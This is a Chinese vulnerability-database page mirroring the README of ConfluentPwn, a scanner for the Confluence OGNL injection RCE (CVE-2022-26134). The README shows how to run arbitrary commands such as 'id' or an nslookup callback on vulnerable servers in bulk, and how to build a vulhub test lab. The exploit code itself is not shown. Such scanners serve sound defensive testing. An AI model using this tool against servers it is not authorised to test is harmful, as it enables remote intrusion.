漏洞平台

POC详情： 650e6e6464858af3f78a6f83602a7ff54ccee9f1

来源

https://github.com/redhuntlabs/ConfluentPwn

关联漏洞

标题： Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
描述：Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能，并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 和 Data Center 存在注入漏洞。攻击者利用该漏洞执行任意代码。以下产品及版本受到影响：1.3.0版本至7.4.17之前版本、7.13.0版本至7.13.7之前版本、7.14.0版本至7.14.3之前版本、7.15.0版本至 7.15.2之前版本、7.16.0版本至7.16.4之

描述

Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134).

介绍

# ConfluentPwn
Confluence pre-auth ONGL injection remote code execution scanner (CVE-2022-26134).

## Usage
The below GIF shows a demo usage of the tool:

![tooldemo](https://user-images.githubusercontent.com/39941993/172548712-6bf81497-99ec-48c2-b076-d8a472c85a1f.gif)


Here is the help output of the tool:
```
$ ./cfscan -h

  +-------------------------------+
  |    C O N F L U E N T P W N    |
  +-------------------------------+

[+] ConfluentPwn by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage:
  -cmd string
        Command to execute on a vulnerable confluence server. (default "id")
  -file string
        Specify a file containing list of hosts to scan.
  -output string
        Output filepath to write the scan results into. (default "cfpwn-results.csv")
  -regex string
        Regex to match the response header for the command executed.
  -threads int
        Number of threads to use while scanning. (default 20)
  -timeout int
        HTTP timeout in seconds. (default 5)
  -user-agent string
        Custom user-agent string to use. (default "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36")

Examples:
  ./cfscan 1.2.3.4:80 1.1.1.1:8080
  ./cfscan -file urls.txt
  ./cfscan -cmd 'nslookup xxxxxxxxxxxxxxxxx.canarytokens.com 1.1.1.1:80'
  ./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Specifying targets
Targets can be specified in two ways:
- Specifying URLs directly via command line.
    ```
    ./cfscan target1 target2 ...
    ```
- Specifying a file containing a list of URLs to scan using the `-file` argument.
    ```
    ./cfscan -file targets.txt
    ```

### Concurrency, timeouts and user-agents
Maximum number of concurrent targets to be processed can be controlled using the `-threads` argument. The default concurrency value is 20.

HTTP timeout value in seconds can be can be specified using the `-timeout` argument. The default timeout is set to 5 seconds.

Custom user-agent can be specified using the `-user-agent` flag, in-case the user wants to track UA strings in their logs.

### Output
The output generated is written to a CSV file, the destination of which can be specified using the `-output` flag. The default output file generated is `cfscan-results.csv`.

The output contains 4 columns:
- target
- confluence version
- vulnerability status
- command output

### Command Specification & Matching
The command to be run on a vulnerable server can be specified using the `-cmd` argument. A regular expression is specified to match the output of the command -- which can be mentioned using the `-regex` flag.

The default command which is run is the `id`, and the regex used to match the output of the command is `uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)`.

Using the flags together looks like:
```
./cfscan -cmd 'id' -regex 'uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)' https://1.1.1.1
./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Setting up a Test Environment
If you'd like to test out the tool or the vulnerability in general, then you can refer to this: [https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134).

The installation process is quite simple, the below commands do the job:
```
$ mkdir confluentpwn && cd confluentpwn && wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
$ docker-compose up -d
```
The app should now be available at `http://localhost:8090`.

### License & Version
The tool is licensed under the MIT license. See [LICENSE](LICENSE).
Currently the tool is at v0.1.

### Credits
The Research Team at [RedHunt Labs](https://redhuntlabs.com) would like to thank [vulhub](https://github.com/vulhub/vulhub) for providing the docker test image.

##### **[`To know more about our Attack Surface Management platform, check out NVADR.`](https://redhuntlabs.com/nvadr)**

文件快照


 [4.0K]  /data/pocs/650e6e6464858af3f78a6f83602a7ff54ccee9f1
├── [ 236]  go.mod
├── [2.1K]  go.sum
├── [1.0K]  LICENSE
├── [4.7K]  main.go
├── [4.1K]  README.md
├── [1.8K]  utils.go
└── [ 543]  writer.go

0 directories, 7 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。